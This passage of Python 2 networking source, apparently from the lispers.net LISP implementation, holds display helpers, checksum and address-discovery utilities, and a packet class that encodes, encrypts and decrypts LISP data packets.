if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color escape sequences to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px;" ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select a random UDP port for use as the source port in a Map-Request and
# the destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
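#
# Illustrative examples (not executed):
#
#   lisp_hex_string(0xff) returns "ff" (no leading "0x")
#   lisp_hex_string(2**64 - 1) returns "ffffffffffffffff" (no trailing "L")
#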
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
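#
# Illustrative examples (not executed): both functions render a rounded
# datetime.timedelta() as a string.
#
#   lisp_print_elapsed(time.time() - 90) returns "0:01:30"
#   lisp_print_future(time.time() + 3600) returns "1:00:00"
#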
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If the destination is IPv4 we
# need to put the address in an IPv6 IPv4-mapped format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
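#
# Illustrative examples (not executed):
#
#   lisp_convert_6to4("::ffff:10.0.0.1") returns "10.0.0.1"
#   lisp_convert_4to6("10.0.0.1") returns a lisp_address() holding
#       "::ffff:10.0.0.1"
#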
#
# lisp_gethostbyname
#
# Return an address if the string is a name or address. If
# socket.gethostbyname() fails, try socket.getaddrinfo(). We may be running
# on Alpine Linux which doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes; otherwise this could be
# a valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
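#
# Minimal usage sketch (illustrative only, hypothetical addresses): build a
# 20-byte IPv4 header with a zeroed checksum field and let lisp_ip_checksum()
# fill in bytes 10 and 11.
#
#   header = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(40), 0,
#       socket.htons(0x4000), 64, 17, 0)
#   header += socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
#   header = lisp_ip_checksum(header)
#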
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Return the first IPv4 address assigned to the interface.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If the dest-MAC is not us, look at the source MAC to see if we are in a
# loopback situation, where an application and the xTR are being tested on
# the same system.
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form of
# "xxxx-xxxx-xxxx". The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
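#
# Illustrative examples (not executed):
#
#   lisp_is_mac_string("0050-56a8-7ae0") returns True
#   lisp_is_mac_string("0050-56a8-7ae0/48") returns True
#   lisp_is_mac_string("my-host-name") returns False (wrong length)
#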
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interface names with colons, dashes, and alphanumeric characters.
#
d = device.replace(":", "")
d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
if (address.is_private_address()): return(address)
addr = a
#endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use the netifaces module to get an IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
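#
# Illustrative lisp.config fragment this function would match (hypothetical
# group address); only first-byte values 224 through 239 are accepted:
#
#   rle-address = 224.1.1.1
#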
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES-CBC that the ciphertext
# is a multiple of 16 bytes.
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Decryption worked. Log it and return the plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
